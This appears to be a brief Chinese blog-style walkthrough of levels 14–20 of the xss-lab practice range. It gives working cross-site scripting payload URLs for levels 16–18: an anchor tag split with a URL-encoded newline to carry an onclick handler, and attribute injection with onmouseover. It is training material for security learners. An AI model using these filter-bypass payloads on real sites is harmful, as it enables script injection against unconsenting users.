简介
xsslab是最经典的xss练习靶场。
GitHub地址--https://github.com/rebo-rn/xss-lab
换个在线靶场--http://test.ctf8.com/
详解
- level-14
这关有点问题,贴出官方题解,http://www.exifviewer.org/访问不了,可能需要梯子吧
- level-15
这关在线靶场也有问题做不出。
- level-16
%0a
是换行符的url编码http://test.ctf8.com/level16.php?keyword=<a%0aonclick='alert(1)'>
- level-17
http://test.ctf8.com/level17.php?arg01=a&arg02=%20onmouseover=alert(1)
- level-18
这关和17关一样http://test.ctf8.com/level18.php?arg01=a&arg02=%20onmouseover=alert(1)
- level-19
这关在线靶场也有问题做不出。看了官方题解。
- level-20
这关在线靶场也有问题做不出。看了官方题解。
结语
后面这几关环境也比较复杂,已经不是简单的html、js拼接。注入点也有变化。